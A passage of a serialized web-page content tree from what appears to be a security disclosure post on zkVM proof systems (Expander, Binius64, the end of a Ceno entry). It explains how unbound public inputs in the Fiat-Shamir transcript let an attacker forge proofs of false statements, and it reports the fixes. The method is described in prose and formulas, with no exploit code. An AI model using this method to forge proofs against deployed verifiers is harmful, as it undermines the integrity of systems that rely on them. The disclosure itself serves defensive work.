"tag":216,"props":124963,"children":124965},{"className":124964},[304],[124966,124986],{"type":25,"tag":216,"props":124967,"children":124969},{"className":124968,"style":97069},[309],[124970],{"type":25,"tag":216,"props":124971,"children":124972},{"style":2274},[124973,124977],{"type":25,"tag":216,"props":124974,"children":124976},{"className":124975,"style":2181},[319],[],{"type":25,"tag":216,"props":124978,"children":124980},{"className":124979},[2186,2187,2188,2189],[124981],{"type":25,"tag":216,"props":124982,"children":124984},{"className":124983},[246,2189],[124985],{"type":31,"value":1882},{"type":25,"tag":216,"props":124987,"children":124989},{"className":124988},[408],[124990],{"type":31,"value":411},{"type":25,"tag":216,"props":124992,"children":124994},{"className":124993},[304],[124995],{"type":25,"tag":216,"props":124996,"children":124998},{"className":124997,"style":2209},[309],[124999],{"type":25,"tag":216,"props":125000,"children":125001},{},[],{"type":25,"tag":216,"props":125003,"children":125005},{"className":125004,"style":335},[257],[],{"type":25,"tag":216,"props":125007,"children":125009},{"className":125008},[340],[125010],{"type":31,"value":343},{"type":25,"tag":216,"props":125012,"children":125014},{"className":125013,"style":335},[257],[],{"type":25,"tag":216,"props":125016,"children":125018},{"className":125017},[235],[125019,125023,125080,125084,125089],{"type":25,"tag":216,"props":125020,"children":125022},{"className":125021,"style":124591},[240],[],{"type":25,"tag":216,"props":125024,"children":125026},{"className":125025},[246],[125027,125032],{"type":25,"tag":216,"props":125028,"children":125030},{"className":125029},[246,2151],[125031],{"type":31,"value":2541},{"type":25,"tag":216,"props":125033,"children":125035},{"className":125034},[2159],[125036],{"type":25,"tag":216,"props":125037,"children":125039},{"className":125038},[298,299],[125040,125069],{"type":25,"tag":216,"props":125041,"children":125043},{"className":125042},[304],[125044,125064],{"type":25,"tag":216,"props":125045,"children":125047},{"className":125046,"style":97069},[309],[125048],{"type":25,"tag":216,"props":125049,"children":125050},{"style":2274},[125051,125055],{"type":25,"tag":216,"props":125052,"children":125054},{"className":125053,"style":2181},[319],[],{"type":25,"tag":216,"props":125056,"children":125058},{"className":125057},[2186,2187,2188,2189],[125059],{"type":25,"tag":216,"props":125060,"children":125062},{"className":125061},[246,2189],[125063],{"type":31,"value":184},{"type":25,"tag":216,"props":125065,"children":125067},{"className":125066},[408],[125068],{"type":31,"value":411},{"type":25,"tag":216,"props":125070,"children":125072},{"className":125071},[304],[125073],{"type":25,"tag":216,"props":125074,"children":125076},{"className":125075,"style":2209},[309],[125077],{"type":25,"tag":216,"props":125078,"children":125079},{},[],{"type":25,"tag":216,"props":125081,"children":125083},{"className":125082,"style":335},[257],[],{"type":25,"tag":216,"props":125085,"children":125087},{"className":125086},[340],[125088],{"type":31,"value":3539},{"type":25,"tag":216,"props":125090,"children":125092},{"className":125091,"style":335},[257],[],{"type":25,"tag":216,"props":125094,"children":125096},{"className":125095},[235],[125097,125101,125106,125110,125115],{"type":25,"tag":216,"props":125098,"children":125100},{"className":125099,"style":96933},[240],[],{"type":25,"tag":216,"props":125102,"children":125104},{"className":125103},[246,2151],[125105],{"type":31,"value":74534},{"type":25,"tag":216,"props":125107,"children":125109},{"className":125108,"style":258},[257],[],{"type":25,"tag":216,"props":125111,"children":125113},{"className":125112},[263],[125114],{"type":31,"value":266},{"type":25,"tag":216,"props":125116,"children":125118},{"className":125117,"style":258},[257],[],{"type":25,"tag":216,"props":125120,"children":125122},{"className":125121},[235],[125123,125127],{"type":25,"tag":216,"props":125124,"children":125126},{"className":125125,"style":5293},[240],[],{"type":25,"tag":216,"props":125128,"children":125130},{"className":125129},[246],[125131],{"type":31,"value":1882},{"type":25,"tag":38,"props":125133,"children":125134},{},[125135],{"type":31,"value":125136},"Substitution reduces this to a quadratic in one variable, which is solvable with the quadratic formula.",{"type":25,"tag":38,"props":125138,"children":125139},{},[125140,125144,125146,125153,125155,125162],{"type":25,"tag":9273,"props":125141,"children":125142},{},[125143],{"type":31,"value":120693},{"type":31,"value":125145}," Fixed on March 5, 2026 via ",{"type":25,"tag":162,"props":125147,"children":125150},{"href":125148,"rel":125149},"https://github.com/scroll-tech/ceno/pull/1262",[166],[125151],{"type":31,"value":125152},"PR #1262",{"type":31,"value":125154}," (original report: ",{"type":25,"tag":162,"props":125156,"children":125159},{"href":125157,"rel":125158},"https://github.com/scroll-tech/ceno/issues/1125",[166],[125160],{"type":31,"value":125161},"#1125",{"type":31,"value":1888},{"type":25,"tag":22753,"props":125164,"children":125165},{},[],{"type":25,"tag":606,"props":125167,"children":125169},{"id":125168},"expander-polyhedra",[125170],{"type":31,"value":125171},"Expander (Polyhedra)",{"type":25,"tag":38,"props":125173,"children":125174},{},[125175],{"type":31,"value":125176},"Expander is a GKR-based proof system for arithmetic circuits.",{"type":25,"tag":38,"props":125178,"children":125179},{},[125180],{"type":25,"tag":9273,"props":125181,"children":125182},{},[125183],{"type":31,"value":119399},{"type":25,"tag":206,"props":125185,"children":125187},{"code":125186},"Proof (raw bytes, parsed in order):\n    - PCS commitment\n    - Sumcheck round polynomials (for each layer)\n    - Layer claims (claim_x, claim_y)\n    - PCS opening proofs\n\nNOT in proof bytes (passed separately):\n    - public_input    // statement data passed separately\n    - claimed_v       // statement claim passed separately\n",[125188],{"type":25,"tag":82,"props":125189,"children":125190},{"__ignoreMap":7},[125191],{"type":31,"value":125186},{"type":25,"tag":38,"props":125193,"children":125194},{},[125195,125197,125203],{"type":31,"value":125196},"In Expander's circuit model, constant gates can reference public input values. During GKR verification, the ",{"type":25,"tag":82,"props":125198,"children":125200},{"className":125199},[],[125201],{"type":31,"value":125202},"eval_cst",{"type":31,"value":125204}," evaluates the contribution of these gates at the sumcheck challenge point:",{"type":25,"tag":206,"props":125206,"children":125208},{"code":125207,"language":6914,"meta":7,"className":6915,"style":7},"sum -= GKRVerifierHelper::eval_cst(&layer.const_, public_input, sp);\n",[125209],{"type":25,"tag":82,"props":125210,"children":125211},{"__ignoreMap":7},[125212],{"type":25,"tag":216,"props":125213,"children":125214},{"class":6922,"line":6923},[125215,125219,125224,125229,125233,125237,125241,125245,125250,125254,125259,125264,125268,125273],{"type":25,"tag":216,"props":125216,"children":125217},{"style":6947},[125218],{"type":31,"value":80604},{"type":25,"tag":216,"props":125220,"children":125221},{"style":6953},[125222],{"type":31,"value":125223}," -=",{"type":25,"tag":216,"props":125225,"children":125226},{"style":7375},[125227],{"type":31,"value":125228}," GKRVerifierHelper",{"type":25,"tag":216,"props":125230,"children":125231},{"style":6953},[125232],{"type":31,"value":7438},{"type":25,"tag":216,"props":125234,"children":125235},{"style":7047},[125236],{"type":31,"value":125202},{"type":25,"tag":216,"props":125238,"children":125239},{"style":6964},[125240],{"type":31,"value":1850},{"type":25,"tag":216,"props":125242,"children":125243},{"style":6953},[125244],{"type":31,"value":7059},{"type":25,"tag":216,"props":125246,"children":125247},{"style":6947},[125248],{"type":31,"value":125249},"layer",{"type":25,"tag":216,"props":125251,"children":125252},{"style":6953},[125253],{"type":31,"value":179},{"type":25,"tag":216,"props":125255,"children":125256},{"style":6964},[125257],{"type":31,"value":125258},"const_, ",{"type":25,"tag":216,"props":125260,"children":125261},{"style":6947},[125262],{"type":31,"value":125263},"public_input",{"type":25,"tag":216,"props":125265,"children":125266},{"style":6964},[125267],{"type":31,"value":7026},{"type":25,"tag":216,"props":125269,"children":125270},{"style":6947},[125271],{"type":31,"value":125272},"sp",{"type":25,"tag":216,"props":125274,"children":125275},{"style":6964},[125276],{"type":31,"value":7797},{"type":25,"tag":38,"props":125278,"children":125279},{},[125280,125282,125287],{"type":31,"value":125281},"This evaluation is a linear combination of public input values, weighted by coefficients derived from the challenges stored in the verifier's scratch pad (",{"type":25,"tag":82,"props":125283,"children":125285},{"className":125284},[],[125286],{"type":31,"value":125272},{"type":31,"value":24702},{"type":25,"tag":38,"props":125289,"children":125290},{},[125291],{"type":25,"tag":9273,"props":125292,"children":125293},{},[125294],{"type":31,"value":125295},"The vulnerability:",{"type":25,"tag":38,"props":125297,"children":125298},{},[125299,125304],{"type":25,"tag":82,"props":125300,"children":125302},{"className":125301},[],[125303],{"type":31,"value":125263},{"type":31,"value":125305}," is never absorbed into the transcript. The transcript is initialized from the PCS commitment and sumcheck round messages, but public inputs are passed separately to the verifier.",{"type":25,"tag":38,"props":125307,"children":125308},{},[125309],{"type":25,"tag":6467,"props":125310,"children":125313},{"alt":125311,"src":125312},"9_expander","/posts/zkvms-unfaithful-claims/9_expander.svg",[],{"type":25,"tag":38,"props":125315,"children":125316},{},[125317,125318,125323],{"type":31,"value":474},{"type":25,"tag":82,"props":125319,"children":125321},{"className":125320},[],[125322],{"type":31,"value":125202},{"type":31,"value":125324}," function computes a linear combination:",{"type":25,"tag":38,"props":125326,"children":125327},{},[125328],{"type":25,"tag":82,"props":125329,"children":125331},{"className":125330},[212,4702],[125332],{"type":25,"tag":216,"props":125333,"children":125335},{"className":125334},[224],[125336],{"type":25,"tag":216,"props":125337,"children":125339},{"className":125338,"ariaHidden":230},[229],[125340,125385,125509],{"type":25,"tag":216,"props":125341,"children":125343},{"className":125342},[235],[125344,125348,125357,125362,125372,125376,125381],{"type":25,"tag":216,"props":125345,"children":125347},{"className":125346,"style":241},[240],[],{"type":25,"tag":216,"props":125349,"children":125351},{"className":125350},[246,31],[125352],{"type":25,"tag":216,"props":125353,"children":125355},{"className":125354},[246],[125356],{"type":31,"value":41511},{"type":25,"tag":216,"props":125358,"children":125360},{"className":125359,"style":2752},[246],[125361],{"type":31,"value":7031},{"type":25,"tag":216,"props":125363,"children":125365},{"className":125364},[246,31],[125366],{"type":25,"tag":216,"props":125367,"children":125369},{"className":125368},[246],[125370],{"type":31,"value":125371},"cst",{"type":25,"tag":216,"props":125373,"children":125375},{"className":125374,"style":258},[257],[],{"type":25,"tag":216,"props":125377,"children":125379},{"className":125378},[263],[125380],{"type":31,"value":266},{"type":25,"tag":216,"props":125382,"children":125384},{"className":125383,"style":258},[257],[],{"type":25,"tag":216,"props":125386,"children":125388},{"className":125387},[235],[125389,125393,125450,125454,125481,125486,125491,125496,125500,125505],{"type":25,"tag":216,"props":125390,"children":125392},{"className":125391,"style":96960},[240],[],{"type":25,"tag":216,"props":125394,"children":125396},{"className":125395},[1841],[125397,125402],{"type":25,"tag":216,"props":125398,"children":125400},{"className":125399,"style":25584},[1841,4048,25583],[125401],{"type":31,"value":4052},{"type":25,"tag":216,"props":125403,"children":125405},{"className":125404},[2159],[125406],{"type":25,"tag":216,"props":125407,"children":125409},{"className":125408},[298,299],[125410,125439],{"type":25,"tag":216,"props":125411,"children":125413},{"className":125412},[304],[125414,125434],{"type":25,"tag":216,"props":125415,"children":125417},{"className":125416,"style":118191},[309],[125418],{"type":25,"tag":216,"props":125419,"children":125420},{"style":25607},[125421,125425],{"type":25,"tag":216,"props":125422,"children":125424},{"className":125423,"style":2181},[319],[],{"type":25,"tag":216,"props":125426,"children":125428},{"className":125427},[2186,2187,2188,2189],[125429],{"type":25,"tag":216,"props":125430,"children":125432},{"className":125431},[246,2151,2189],[125433],{"type":31,"value":2289},{"type":25,"tag":216,"props":125435,"children":125437},{"className":125436},[408],[125438],{"type":31,"value":411},{"type":25,"tag":216,"props":125440,"children":125442},{"className":125441},[304],[125443],{"type":25,"tag":216,"props":125444,"children":125446},{"className":125445,"style":118471},[309],[125447],{"type":25,"tag":216,"props":125448,"children":125449},{},[],{"type":25,"tag":216,"props":125451,"children":125453},{"className":125452,"style":1871},[257],[],{"type":25,"tag":216,"props":125455,"children":125457},{"className":125456},[246],[125458,125467,125472],{"type":25,"tag":216,"props":125459,"children":125461},{"className":125460},[246,31],[125462],{"type":25,"tag":216,"props":125463,"children":125465},{"className":125464},[246],[125466],{"type":31,"value":65643},{"type":25,"tag":216,"props":125468,"children":125470},{"className":125469,"style":2752},[246],[125471],{"type":31,"value":7031},{"type":25,"tag":216,"props":125473,"children":125475},{"className":125474},[246,31],[125476],{"type":25,"tag":216,"props":125477,"children":125479},{"className":125478},[246],[125480],{"type":31,"value":12319},{"type":25,"tag":216,"props":125482,"children":125484},{"className":125483},[287],[125485],{"type":31,"value":7701},{"type":25,"tag":216,"props":125487,"children":125489},{"className":125488},[246,2151],[125490],{"type":31,"value":2289},{"type":25,"tag":216,"props":125492,"children":125494},{"className":125493},[427],[125495],{"type":31,"value":19368},{"type":25,"tag":216,"props":125497,"children":125499},{"className":125498,"style":335},[257],[],{"type":25,"tag":216,"props":125501,"children":125503},{"className":125502},[340],[125504],{"type":31,"value":343},{"type":25,"tag":216,"props":125506,"children":125508},{"className":125507,"style":335},[257],[],{"type":25,"tag":216,"props":125510,"children":125512},{"className":125511},[235],[125513,125517,125526,125531,125536,125541,125545,125594],{"type":25,"tag":216,"props":125514,"children":125516},{"className":125515,"style":5513},[240],[],{"type":25,"tag":216,"props":125518,"children":125520},{"className":125519},[246,31],[125521],{"type":25,"tag":216,"props":125522,"children":125524},{"className":125523},[246],[125525],{"type":31,"value":116579},{"type":25,"tag":216,"props":125527,"children":125529},{"className":125528},[287],[125530],{"type":31,"value":1850},{"type":25,"tag":216,"props":125532,"children":125534},{"className":125533},[246,2151],[125535],{"type":31,"value":2289},{"type":25,"tag":216,"props":125537,"children":125539},{"className":125538},[1864],[125540],{"type":31,"value":1867},{"type":25,"tag":216,"props":125542,"children":125544},{"className":125543,"style":1871},[257],[],{"type":25,"tag":216,"props":125546,"children":125548},{"className":125547},[246,116141],[125549],{"type":25,"tag":216,"props":125550,"children":125552},{"className":125551},[298],[125553],{"type":25,"tag":216,"props":125554,"children":125556},{"className":125555},[304],[125557],{"type":25,"tag":216,"props":125558,"children":125560},{"className":125559,"style":116226},[309],[125561,125573],{"type":25,"tag":216,"props":125562,"children":125563},{"style":116158},[125564,125568],{"type":25,"tag":216,"props":125565,"children":125567},{"className":125566,"style":320},[319],[],{"type":25,"tag":216,"props":125569,"children":125571},{"className":125570,"style":2752},[246,2151],[125572],{"type":31,"value":97829},{"type":25,"tag":216,"props":125574,"children":125575},{"style":116158},[125576,125580],{"type":25,"tag":216,"props":125577,"children":125579},{"className":125578,"style":320},[319],[],{"type":25,"tag":216,"props":125581,"children":125583},{"className":125582,"style":116250},[116180],[125584],{"type":25,"tag":216,"props":125585,"children":125587},{"className":125586,"style":116256},[116255],[125588],{"type":25,"tag":38236,"props":125589,"children":125590},{"xmlns":116260,"width":116261,"height":116262,"style":116263,"viewBox":116264,"preserveAspectRatio":116265},[125591],{"type":25,"tag":116268,"props":125592,"children":125593},{"d":116270},[],{"type":25,"tag":216,"props":125595,"children":125597},{"className":125596},[427],[125598],{"type":31,"value":1888},{"type":25,"tag":38,"props":125600,"children":125601},{},[125602,125603,125672,125674,125679,125681,125686],{"type":31,"value":119819},{"type":25,"tag":82,"props":125604,"children":125606},{"className":125605},[212,4702],[125607],{"type":25,"tag":216,"props":125608,"children":125610},{"className":125609},[224],[125611],{"type":25,"tag":216,"props":125612,"children":125614},{"className":125613,"ariaHidden":230},[229],[125615],{"type":25,"tag":216,"props":125616,"children":125618},{"className":125617},[235],[125619,125623],{"type":25,"tag":216,"props":125620,"children":125622},{"className":125621,"style":116226},[240],[],{"type":25,"tag":216,"props":125624,"children":125626},{"className":125625},[246,116141],[125627],{"type":25,"tag":216,"props":125628,"children":125630},{"className":125629},[298],[125631],{"type":25,"tag":216,"props":125632,"children":125634},{"className":125633},[304],[125635],{"type":25,"tag":216,"props":125636,"children":125638},{"className":125637,"style":116226},[309],[125639,125651],{"type":25,"tag":216,"props":125640,"children":125641},{"style":116158},[125642,125646],{"type":25,"tag":216,"props":125643,"children":125645},{"className":125644,"style":320},[319],[],{"type":25,"tag":216,"props":125647,"children":125649},{"className":125648,"style":2752},[246,2151],[125650],{"type":31,"value":97829},{"type":25,"tag":216,"props":125652,"children":125653},{"style":116158},[125654,125658],{"type":25,"tag":216,"props":125655,"children":125657},{"className":125656,"style":320},[319],[],{"type":25,"tag":216,"props":125659,"children":125661},{"className":125660,"style":116250},[116180],[125662],{"type":25,"tag":216,"props":125663,"children":125665},{"className":125664,"style":116256},[116255],[125666],{"type":25,"tag":38236,"props":125667,"children":125668},{"xmlns":116260,"width":116261,"height":116262,"style":116263,"viewBox":116264,"preserveAspectRatio":116265},[125669],{"type":25,"tag":116268,"props":125670,"children":125671},{"d":116270},[],{"type":31,"value":125673}," contains the challenges. Since challenges are derived before the statement data is bound, they are independent of ",{"type":25,"tag":82,"props":125675,"children":125677},{"className":125676},[],[125678],{"type":31,"value":125263},{"type":31,"value":125680},". This lets an attacker choose an arbitrary false statement (e.g., a forged output) and then solve the induced linear constraints for a modified ",{"type":25,"tag":82,"props":125682,"children":125684},{"className":125683},[],[125685],{"type":31,"value":125263},{"type":31,"value":125687}," that makes the verifier's check pass.",{"type":25,"tag":38,"props":125689,"children":125690},{},[125691,125695,125697,125704,125705,125708,125715],{"type":25,"tag":9273,"props":125692,"children":125693},{},[125694],{"type":31,"value":120693},{"type":31,"value":125696}," Fixed on 21st January 2026 via ",{"type":25,"tag":162,"props":125698,"children":125701},{"href":125699,"rel":125700},"https://github.com/PolyhedraZK/Expander/commit/4a8c2be03535194c1f6b48a93ad2f5480649f7c2",[166],[125702],{"type":31,"value":125703},"commit 4a8c2be",{"type":31,"value":10409},{"type":25,"tag":34930,"props":125706,"children":125707},{},[],{"type":25,"tag":162,"props":125709,"children":125712},{"href":125710,"rel":125711},"https://blog.polyhedra.network/expander-bug-bounty/",[166],[125713],{"type":31,"value":125714},"Claimed 500k Bug bounty",{"type":31,"value":125716}," award pending",{"type":25,"tag":22753,"props":125718,"children":125719},{},[],{"type":25,"tag":606,"props":125721,"children":125723},{"id":125722},"binius64",[125724],{"type":31,"value":111848},{"type":25,"tag":38,"props":125726,"children":125727},{},[125728,125730,125856],{"type":31,"value":125729},"Binius64 is a proof system optimized for binary fields, designed to be efficient on 64-bit CPUs. Binius uses ",{"type":25,"tag":82,"props":125731,"children":125733},{"className":125732},[212,4702],[125734],{"type":25,"tag":216,"props":125735,"children":125737},{"className":125736},[224],[125738],{"type":25,"tag":216,"props":125739,"children":125741},{"className":125740,"ariaHidden":230},[229],[125742],{"type":25,"tag":216,"props":125743,"children":125745},{"className":125744},[235],[125746,125751],{"type":25,"tag":216,"props":125747,"children":125750},{"className":125748,"style":125749},[240],"height:0.8665em;vertical-align:-0.1776em;",[],{"type":25,"tag":216,"props":125752,"children":125754},{"className":125753},[246],[125755,125761],{"type":25,"tag":216,"props":125756,"children":125759},{"className":125757},[246,125758],"mathbb",[125760],{"type":31,"value":5947},{"type":25,"tag":216,"props":125762,"children":125764},{"className":125763},[2159],[125765],{"type":25,"tag":216,"props":125766,"children":125768},{"className":125767},[298,299],[125769,125844],{"type":25,"tag":216,"props":125770,"children":125772},{"className":125771},[304],[125773,125839],{"type":25,"tag":216,"props":125774,"children":125776},{"className":125775,"style":5097},[309],[125777],{"type":25,"tag":216,"props":125778,"children":125780},{"style":125779},"top:-2.5224em;margin-left:0em;margin-right:0.05em;",[125781,125785],{"type":25,"tag":216,"props":125782,"children":125784},{"className":125783,"style":2181},[319],[],{"type":25,"tag":216,"props":125786,"children":125788},{"className":125787},[2186,2187,2188,2189],[125789],{"type":25,"tag":216,"props":125790,"children":125792},{"className":125791},[246,2189],[125793],{"type":25,"tag":216,"props":125794,"children":125796},{"className":125795},[246,2189],[125797,125802],{"type":25,"tag":216,"props":125798,"children":125800},{"className":125799},[246,2189],[125801],{"type":31,"value":331},{"type":25,"tag":216,"props":125803,"children":125805},{"className":125804},[2159],[125806],{"type":25,"tag":216,"props":125807,"children":125809},{"className":125808},[298],[125810],{"type":25,"tag":216,"props":125811,"children":125813},{"className":125812},[304],[125814],{"type":25,"tag":216,"props":125815,"children":125818},{"className":125816,"style":125817},[309],"height:0.7463em;",[125819],{"type":25,"tag":216,"props":125820,"children":125821},{"style":116447},[125822,125826],{"type":25,"tag":216,"props":125823,"children":125825},{"className":125824,"style":5106},[319],[],{"type":25,"tag":216,"props":125827,"children":125829},{"className":125828},[2186,5111,5112,2189],[125830],{"type":25,"tag":216,"props":125831,"children":125833},{"className":125832},[246,2189],[125834],{"type":25,"tag":216,"props":125835,"children":125837},{"className":125836},[246,2189],[125838],{"type":31,"value":33808},{"type":25,"tag":216,"props":125840,"children":125842},{"className":125841},[408],[125843],{"type":31,"value":411},{"type":25,"tag":216,"props":125845,"children":125847},{"className":125846},[304],[125848],{"type":25,"tag":216,"props":125849,"children":125852},{"className":125850,"style":125851},[309],"height:0.1776em;",[125853],{"type":25,"tag":216,"props":125854,"children":125855},{},[],{"type":31,"value":125857}," (or variants thereof), where addition is XOR. This makes certain operations very fast.",{"type":25,"tag":38,"props":125859,"children":125860},{},[125861,125863,125868],{"type":31,"value":125862},"One of Binius's key features is its specialized protocols for bitwise operations. The ",{"type":25,"tag":9273,"props":125864,"children":125865},{},[125866],{"type":31,"value":125867},"Shift Protocol",{"type":31,"value":125869}," efficiently handles bit-shifts and rotations (essential for hash functions like SHA-256) without the massive overhead typical in other proof systems.",{"type":25,"tag":38,"props":125871,"children":125872},{},[125873],{"type":25,"tag":9273,"props":125874,"children":125875},{},[125876],{"type":31,"value":125295},{"type":25,"tag":38,"props":125878,"children":125879},{},[125880],{"type":31,"value":125881},"The verifier receives the public witness (program inputs/outputs) as a separate parameter:",{"type":25,"tag":206,"props":125883,"children":125885},{"code":125884,"language":6914,"meta":7,"className":6915,"style":7},"pub fn verify\u003CF, C>(\n    constraint_system: &ConstraintSystem,\n    public: &[Word],    // \u003C- NEVER ABSORBED\n    // ...\n) -> Result\u003CVerifyOutput\u003CF>, Error>\n",[125886],{"type":25,"tag":82,"props":125887,"children":125888},{"__ignoreMap":7},[125889,125924,125949,125983,125991],{"type":25,"tag":216,"props":125890,"children":125891},{"class":6922,"line":6923},[125892,125896,125900,125904,125908,125912,125916,125920],{"type":25,"tag":216,"props":125893,"children":125894},{"style":6936},[125895],{"type":31,"value":17647},{"type":25,"tag":216,"props":125897,"children":125898},{"style":6936},[125899],{"type":31,"value":17652},{"type":25,"tag":216,"props":125901,"children":125902},{"style":7047},[125903],{"type":31,"value":12118},{"type":25,"tag":216,"props":125905,"children":125906},{"style":6964},[125907],{"type":31,"value":9757},{"type":25,"tag":216,"props":125909,"children":125910},{"style":7375},[125911],{"type":31,"value":5947},{"type":25,"tag":216,"props":125913,"children":125914},{"style":6964},[125915],{"type":31,"value":7026},{"type":25,"tag":216,"props":125917,"children":125918},{"style":7375},[125919],{"type":31,"value":120212},{"type":25,"tag":216,"props":125921,"children":125922},{"style":6964},[125923],{"type":31,"value":10540},{"type":25,"tag":216,"props":125925,"children":125926},{"class":6922,"line":6769},[125927,125932,125936,125940,125945],{"type":25,"tag":216,"props":125928,"children":125929},{"style":6947},[125930],{"type":31,"value":125931},"    constraint_system",{"type":25,"tag":216,"props":125933,"children":125934},{"style":6953},[125935],{"type":31,"value":1472},{"type":25,"tag":216,"props":125937,"children":125938},{"style":6953},[125939],{"type":31,"value":11093},{"type":25,"tag":216,"props":125941,"children":125942},{"style":7375},[125943],{"type":31,"value":125944},"ConstraintSystem",{"type":25,"tag":216,"props":125946,"children":125947},{"style":6964},[125948],{"type":31,"value":7465},{"type":25,"tag":216,"props":125950,"children":125951},{"class":6922,"line":6778},[125952,125956,125960,125964,125968,125973,125978],{"type":25,"tag":216,"props":125953,"children":125954},{"style":6947},[125955],{"type":31,"value":11473},{"type":25,"tag":216,"props":125957,"children":125958},{"style":6953},[125959],{"type":31,"value":1472},{"type":25,"tag":216,"props":125961,"children":125962},{"style":6953},[125963],{"type":31,"value":11093},{"type":25,"tag":216,"props":125965,"children":125966},{"style":6964},[125967],{"type":31,"value":7701},{"type":25,"tag":216,"props":125969,"children":125970},{"style":7375},[125971],{"type":31,"value":125972},"Word",{"type":25,"tag":216,"props":125974,"children":125975},{"style":6964},[125976],{"type":31,"value":125977},"],    ",{"type":25,"tag":216,"props":125979,"children":125980},{"style":6927},[125981],{"type":31,"value":125982},"// \u003C- NEVER ABSORBED\n",{"type":25,"tag":216,"props":125984,"children":125985},{"class":6922,"line":7005},[125986],{"type":25,"tag":216,"props":125987,"children":125988},{"style":6927},[125989],{"type":31,"value":125990},"    // ...\n",{"type":25,"tag":216,"props":125992,"children":125993},{"class":6922,"line":7110},[125994,125998,126002,126006,126010,126015,126019,126023,126027,126031],{"type":25,"tag":216,"props":125995,"children":125996},{"style":6964},[125997],{"type":31,"value":7036},{"type":25,"tag":216,"props":125999,"children":126000},{"style":6953},[126001],{"type":31,"value":17714},{"type":25,"tag":216,"props":126003,"children":126004},{"style":7375},[126005],{"type":31,"value":17719},{"type":25,"tag":216,"props":126007,"children":126008},{"style":6964},[126009],{"type":31,"value":9757},{"type":25,"tag":216,"props":126011,"children":126012},{"style":7375},[126013],{"type":31,"value":126014},"VerifyOutput",{"type":25,"tag":216,"props":126016,"children":126017},{"style":6964},[126018],{"type":31,"value":9757},{"type":25,"tag":216,"props":126020,"children":126021},{"style":7375},[126022],{"type":31,"value":5947},{"type":25,"tag":216,"props":126024,"children":126025},{"style":6964},[126026],{"type":31,"value":10582},{"type":25,"tag":216,"props":126028,"children":126029},{"style":7375},[126030],{"type":31,"value":41361},{"type":25,"tag":216,"props":126032,"children":126033},{"style":6964},[126034],{"type":31,"value":9943},{"type":25,"tag":38,"props":126036,"children":126037},{},[126038,126040,126046,126047,126053,126055,126059],{"type":31,"value":126039},"In the shift protocol, challenges ",{"type":25,"tag":82,"props":126041,"children":126043},{"className":126042},[],[126044],{"type":31,"value":126045},"r_j",{"type":31,"value":1307},{"type":25,"tag":82,"props":126048,"children":126050},{"className":126049},[],[126051],{"type":31,"value":126052},"inout_eval_point",{"type":31,"value":126054}," are sampled ",{"type":25,"tag":9273,"props":126056,"children":126057},{},[126058],{"type":31,"value":108549},{"type":31,"value":126060}," the public witness is bound.",{"type":25,"tag":38,"props":126062,"children":126063},{},[126064],{"type":25,"tag":9273,"props":126065,"children":126066},{},[126067],{"type":31,"value":119415},{"type":25,"tag":38,"props":126069,"children":126070},{},[126071],{"type":25,"tag":6467,"props":126072,"children":126075},{"alt":126073,"src":126074},"10_binius","/posts/zkvms-unfaithful-claims/10_binius.svg",[],{"type":25,"tag":38,"props":126077,"children":126078},{},[126079],{"type":31,"value":126080},"During verification",{"type":25,"tag":6711,"props":126082,"children":126083},{},[126084,126104,126116,126135],{"type":25,"tag":2043,"props":126085,"children":126086},{},[126087,126089,126094,126096,126102],{"type":31,"value":126088},"Sumcheck produces challenge points ",{"type":25,"tag":82,"props":126090,"children":126092},{"className":126091},[],[126093],{"type":31,"value":126045},{"type":31,"value":126095}," (bit indices) and ",{"type":25,"tag":82,"props":126097,"children":126099},{"className":126098},[],[126100],{"type":31,"value":126101},"r_s",{"type":31,"value":126103}," (shift indices)",{"type":25,"tag":2043,"props":126105,"children":126106},{},[126107,126109,126114],{"type":31,"value":126108},"Verifier samples ",{"type":25,"tag":82,"props":126110,"children":126112},{"className":126111},[],[126113],{"type":31,"value":126052},{"type":31,"value":126115}," from transcript",{"type":25,"tag":2043,"props":126117,"children":126118},{},[126119,126121,126127,126129,126134],{"type":31,"value":126120},"Verifier computes ",{"type":25,"tag":82,"props":126122,"children":126124},{"className":126123},[],[126125],{"type":31,"value":126126},"public_eval = MLE(public, r_j, inout_eval_point)",{"type":31,"value":126128}," using the unbound ",{"type":25,"tag":82,"props":126130,"children":126132},{"className":126131},[],[126133],{"type":31,"value":65643},{"type":31,"value":22092},{"type":25,"tag":2043,"props":126136,"children":126137},{},[126138,126139,126145],{"type":31,"value":474},{"type":25,"tag":82,"props":126140,"children":126142},{"className":126141},[],[126143],{"type":31,"value":126144},"public_eval",{"type":31,"value":126146}," feeds into subsequent verification equations",{"type":25,"tag":38,"props":126148,"children":126149},{},[126150],{"type":31,"value":126151},"The MLE evaluation is linear in the public witness bits:",{"type":25,"tag":38,"props":126153,"children":126154},{},[126155],{"type":25,"tag":82,"props":126156,"children":126158},{"className":126157},[212,4702],[126159],{"type":25,"tag":216,"props":126160,"children":126162},{"className":126161},[224],[126163],{"type":25,"tag":216,"props":126164,"children":126166},{"className":126165,"ariaHidden":230},[229],[126167,126211,126350,126462],{"type":25,"tag":216,"props":126168,"children":126170},{"className":126169},[235],[126171,126175,126184,126189,126198,126202,126207],{"type":25,"tag":216,"props":126172,"children":126174},{"className":126173,"style":241},[240],[],{"type":25,"tag":216,"props":126176,"children":126178},{"className":126177},[246,31],[126179],{"type":25,"tag":216,"props":126180,"children":126182},{"className":126181},[246],[126183],{"type":31,"value":65643},{"type":25,"tag":216,"props":126185,"children":126187},{"className":126186,"style":2752},[246],[126188],{"type":31,"value":7031},{"type":25,"tag":216,"props":126190,"children":126192},{"className":126191},[246,31],[126193],{"type":25,"tag":216,"props":126194,"children":126196},{"className":126195},[246],[126197],{"type":31,"value":41511},{"type":25,"tag":216,"props":126199,"children":126201},{"className":126200,"style":258},[257],[],{"type":25,"tag":216,"props":126203,"children":126205},{"className":126204},[263],[126206],{"type":31,"value":266},{"type":25,"tag":216,"props":126208,"children":126210},{"className":126209,"style":258},[257],[],{"type":25,"tag":216,"props":126212,"children":126214},{"className":126213},[235],[126215,126219,126290,126294,126307,126312,126317,126322,126327,126332,126337,126341,126346],{"type":25,"tag":216,"props":126216,"children":126218},{"className":126217,"style":122745},[240],[],{"type":25,"tag":216,"props":126220,"children":126222},{"className":126221},[1841],[126223,126228],{"type":25,"tag":216,"props":126224,"children":126226},{"className":126225,"style":25584},[1841,4048,25583],[126227],{"type":31,"value":4052},{"type":25,"tag":216,"props":126229,"children":126231},{"className":126230},[2159],[126232],{"type":25,"tag":216,"props":126233,"children":126235},{"className":126234},[298,299],[126236,126279],{"type":25,"tag":216,"props":126237,"children":126239},{"className":126238},[304],[126240,126274],{"type":25,"tag":216,"props":126241,